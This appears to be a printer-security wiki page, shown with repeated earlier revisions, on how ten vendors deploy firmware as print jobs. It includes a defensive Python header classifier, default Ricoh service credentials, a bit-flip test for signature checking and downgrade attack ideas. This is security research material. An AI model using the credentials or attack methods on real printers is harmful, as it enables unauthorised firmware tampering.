Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code>, were found. Regarding protection mechanisms, Dell has not released any publicly available information.

=== Brother ===

Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code>, while 9 <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms.

=== Lexmark ===

Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>.

=== Samsung ===

Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or as Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms.

=== Xerox ===

Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files, which is the format currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution: the private key and the tool used for code signing were contained in the firmware itself.

=== Ricoh ===

The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the web contains direct links to a couple of driver/firmware download pages, so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>.

=== Kyocera ===

Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended, the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms.
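Since nearly every vendor above delivers firmware with a recognisable PJL or PRESCRIBE header, the quickest way to triage a downloaded update, or to notice one passing through a print queue that should only carry documents, is to inspect its first bytes. The following Python classifier is an added example for this page, not the wiki's own tooling and not vendor code. The PJL strings are those listed in the vendor sections and in the summary table of the Results section; the cramfs, squashfs and u-boot uImage magic numbers are the standard ones for those formats. The sample headers are constructed, and the function names and the channel labels are the example's own.

```python
"""Triage printer firmware files by their leading bytes.

Added example for this wiki page (not the wiki's tooling, not vendor code).
Labels follow the "File header or type" column of the summary table.
"""
import re
import struct

UEL = b"\x1b%-12345X"   # PJL universal exit language sequence

# PJL firmware-update commands named in the vendor sections and the summary
# table. Any hit means the update is delivered as an ordinary print job.
PJL_FIRMWARE_HEADERS = [
    (rb"@PJL\s+UPGRADE\s+SIZE=", "@PJL UPGRADE SIZE=..."),
    (rb"@PJL\s+FIRMWARE=", "@PJL FIRMWARE=..."),
    (rb"@PJL\s+ENTER\s+LANGUAGE=DOWNLOAD\b", "@PJL ENTER LANGUAGE=DOWNLOAD"),
    (rb"@PJL\s+ENTER\s+LANGUAGE=FIRMUPDATE\b", "@PJL ENTER LANGUAGE=FIRMUPDATE"),
    (rb"@PJL\s+ENTER\s+LANGUAGE=UPGRADE\b", "@PJL ENTER LANGUAGE=UPGRADE"),
    (rb"@PJL\s+ENTER\s+LANGUAGE=X?FLASH\b", "@PJL ENTER LANGUAGE=FLASH/XFLASH"),
    (rb"@PJL\s+LPROGRAMRIP\b", "@PJL LPROGRAMRIP"),
    (rb"@PJL\s+EXECUTE\s+BRDOWNLOAD\b", "@PJL EXECUTE BRDOWNLOAD"),
    (rb"@PJL\s+FWDOWNLOAD\b", "@PJL FWDOWNLOAD"),
    (rb"@PJL\s+RSYSTEMUPDATE\s+SIZE=", "@PJL RSYSTEMUPDATE SIZE=..."),
    (rb"@PJL\s+DEFAULT\s+SWUPGRADE=ON\b", "@PJL DEFAULT SWUPGRADE=ON"),
    (rb'@PJL\s+SET\s+JOBATTR="@SWDL"', '@PJL SET JOBATTR="@SWDL"'),
]
# Kyocera's PRESCRIBE upgrade command (see the Kyocera section).
PRESCRIBE_UPGRADE_RE = re.compile(rb"!R!\s*UPGR\b")
PS_HEADER_RE = re.compile(rb"^%!PS", re.M)
PS_TITLE_RE = re.compile(rb"^%%Title:\s*(.+?)\s*$", re.M)

# Images found inside (or as) firmware; not print jobs, but often mountable.
CRAMFS_MAGIC_LE = struct.pack("<I", 0x28CD3D45)
SQUASHFS_MAGIC = (b"hsqs", b"sqsh")          # little / big endian
UIMAGE_MAGIC = struct.pack(">I", 0x27051956)

HEADER_WINDOW = 4096   # only the start of a file is inspected


def classify_firmware(data: bytes) -> tuple:
    """Return (label, channel). channel is 'print job (PJL)',
    'print job (PRESCRIBE)', 'print job (PostScript)', 'binary image'
    or 'unknown'."""
    head = data[:HEADER_WINDOW]
    for pattern, label in PJL_FIRMWARE_HEADERS:
        if re.search(pattern, head):
            return label, "print job (PJL)"
    if PRESCRIBE_UPGRADE_RE.search(head):
        return "!R! UPGR (PRESCRIBE upgrade command)", "print job (PRESCRIBE)"
    if PS_HEADER_RE.search(head):
        title = PS_TITLE_RE.search(head)
        label = "PostScript"
        if title:
            label += " (title: " + title.group(1).decode(errors="replace") + ")"
        return label, "print job (PostScript)"
    if head.startswith(CRAMFS_MAGIC_LE):
        return "cramfs image", "binary image"
    if head[:4] in SQUASHFS_MAGIC:
        return "squashfs image", "binary image"
    if head.startswith(UIMAGE_MAGIC):
        return "u-boot legacy uImage", "binary image"
    return "unknown binary format", "unknown"


def deployed_over_print_channel(data: bytes) -> bool:
    """True when the file is an update the printer accepts as a print job,
    i.e. exactly the case a print-channel monitor should alert on."""
    return classify_firmware(data)[1].startswith("print job")


# Constructed sample headers (not real vendor files) for a self-check.
SAMPLES = {
    "hp_rfu": UEL + b"@PJL UPGRADE SIZE=2334432\r\n" + b"\x00" * 32,
    "kyocera": b"!R! UPGR'SYS';EXIT;\r\n" + b"\x00" * 32,
    "xerox_ps": UEL + b"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n"
                b"%!PS-Adobe-3.0\n%%Title: Firmware Update\n",
    "squashfs": b"hsqs" + b"\x00" * 60,
    "cramfs": CRAMFS_MAGIC_LE + b"\x00" * 60,
    "uimage": UIMAGE_MAGIC + b"\x00" * 60,
    "blob": bytes(range(64)),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        label, channel = classify_firmware(blob)
        print(f"{name:9} {channel:24} {label}")
```

The classifier only answers the question the Results section raises, namely whether an update travels over the printing channel; it says nothing about whether a signature is checked, which the page notes cannot be determined from the file alone.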
=== Konica ===

Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'', which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure, as a hash value without a signature can be recomputed by anyone who modifies the firmware.

== Results ==

Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures, which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer, Kyocera, applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself, and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however is hard, as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below:

{| class="wikitable"
|-
! Vendor !! Extension !! Quantity !! File header or type
|-
| rowspan="2" | HP
| rfu || 419 || @PJL UPGRADE SIZE=…
|-
| bdl || 206 || FutureSmart binary format
|-
| rowspan="3" | Epson
| rcx || 49 || SEIKO EPSON EpsonNet Form
|-
| prn || 9 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span>
|-
| brn || 7 || <span style="background:#F0E68C">Unknown binary, includes config file</span>
|-
| rowspan="6" | Dell
| fls, fly || 30 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span>
|-
| prn || 25 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span>
|-
| hd || 18 || <span style="background:#F4A460">@PJL FIRMWARE=…</span>
|-
| brn || 3 || <span style="background:#F0E68C">Unknown binary, includes config file</span>
|-
| ps || 2 || PostScript (title: ''Firmware Update'')
|-
| pjl || 1 || @PJL ENTER LANGUAGE=FLASH
|-
| rowspan="2" | Brother
| djf || 79 || @PJL EXECUTE BRDOWNLOAD
|-
| blf || 9 || @PJL ENTER LANGUAGE=PCL
|-
| rowspan="2" | Lexmark
| fls || 63 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span>
|-
| bin, fls || 6 || Unknown binary format
|-
| rowspan="2" | Samsung
| hd || 33 || <span style="background:#F4A460">@PJL FIRMWARE=…</span>
|-
| fls, hd0 || 4 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span>
|-
| rowspan="10" | Xerox
| ps || 36 || PostScript (title: ''Firmware Update'')
|-
| dlm || 35 || Xerox Dynamic Loadable Module
|-
| prn, bin || 20 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span>
|-
| hd || 16 || <span style="background:#F4A460">@PJL FIRMWARE=…</span>
|-
| brn || 10 || <span style="background:#F0E68C">Unknown binary, includes config file</span>
|-
| bin || 10 || @PJL SET JOBATTR="@SWDL"
|-
| fls, hd, hde || 8 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span>
|-
| fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH
|-
| pjl || 3 || @PJL FSDOWNLOAD [name].rpm
|-
| axf || 3 || RISC OS AIF executable
|-
| rowspan="3" | Ricoh
| brn || 15 || @PJL FWDOWNLOAD…
|-
| bin || 14 || @PJL RSYSTEMUPDATE SIZE=…
|-
| fls || 4 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span>
|-
| rowspan="4" | Kyocera
| cramfs, img || 98 || cramfs image
|-
| bin, squashfs || 79 || squashfs image
|-
| bin, kmmfp || 41 || u-boot legacy uImage
|-
| efi, kmpanel || 13 || proprietary image format
|-
| rowspan="4" | Konica Minolta
| bin || 38 || unknown binary, additional checksum file
|-
| ps || 20 || PostScript (title: ''Softload printer modules'')
|-
| ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE
|-
| upg || 1 || @PJL ENTER LANGUAGE=UPGRADE
|}

'''How to test for this attack?'''

The security of code signing is based on keeping the private key a long-term trade secret. There are however still printers in the wild which are potentially vulnerable to malicious firmware, either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project.

''Other attack scenarios include:''

* Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version which has known security weaknesses.
* Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easily mountable).
* Just because firmware is signed doesn't mean it's secure. Using ''binwalk''/''grep'' etc.
one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547]. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 4144f76c23975d0a096f947180baaeed2c57a8e2 321 320 2017-01-31T09:04:53Z 84.153.135.37 0 /* Results */ wikitext text/x-wiki The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device. Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. 
Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>. == Vendors == To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows. === HP === Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>. 
=== Canon === Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’. === Epson === Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms. === Dell === Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. 
Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information. === Brother === Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code>, while 9 <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms. === Lexmark === Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>. 
=== Samsung === Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms. === Xerox === Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself. === Ricoh === The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any up-to-date information on protection mechanisms. 
In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>. === Kyocera === Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms. === Konica === Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. 
The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure. == Results == Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below: {| class="wikitable" |- ! Vendor !! Extension !! Quantity !! 
File header or type |- | rowspan="2" | HP | rfu || 419 || @PJL UPGRADE SIZE=… |- | bdl || 206 || FutureSmart binary format |- | rowspan="3" | Epson | rcx || 49 || SEIKO EPSON EpsonNet Form |- | prn || 9 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | brn || 7 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | rowspan="6" | Dell | fls, fly || 30 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | prn || 25 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 18 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 3 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | ps || 2 || PostScript (title: ''Firmware Update'') |- | pjl || 1 || @PJL ENTER LANGUAGE=FLASH |- | rowspan="2" | Brother | djf || 79 || @PJL EXECUTE BRDOWNLOAD |- | blf || 9 || @PJL ENTER LANGUAGE=PCL |- | rowspan="2" | Lexmark | fls || 63 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | bin, fls || 6 || Unknown binary format |- | rowspan="2" | Samsung | hd || 33 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | fls, hd0 || 4 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | rowspan="10" | Xerox | ps || 36 || PostScript (title: ''Firmware Update'') |- | dlm || 35 || Xerox Dynamic Loadable Module |- | prn, bin || 20 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 16 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 10 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | bin || 10 || @PJL SET JOBATTR="@SWDL" |- | fls, hd, hde || 8 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH |- | pjl || 3 || @PJL FSDOWNLOAD [name].rpm |- | axf || 3 || RISC OS AIF executable |- | rowspan="3" | Ricoh | brn || 15 || @PJL FWDOWNLOAD… |- | bin || 14 || @PJL 
RSYSTEMUPDATE SIZE=… |- | fls || 4 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | rowspan="4" | Kyocera | cramfs, img || 98 || cramfs image |- | bin, squashfs || 79 || squashfs image |- | bin, kmmfp || 41 || u-boot legacy uImage |- | efi, kmpanel || 13 || proprietary image format |- | rowspan="4" | Konica Minolta | bin || 38 || unknown binary, additional checksum file |- | ps || 20 || PostScript (title: ''Softload printer modules'') |- | ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE |- | upg || 1 || @PJL ENTER LANGUAGE=UPGRADE |- |} '''How to test for this attack?''' The security of code signing is based on keeping the private key a long-term trade secret. There are however still printers in the wild which are potentially vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfied by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project. ''Other attack scenarios include:'' * Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version which has known security weaknesses. * Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable). * Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. 
one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547]. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 68144e588747b9ea3b9330aeed036e5a4df66b3a 320 319 2017-01-31T08:58:10Z 84.153.135.37 0 /* Brother */ wikitext text/x-wiki The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device. Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. 
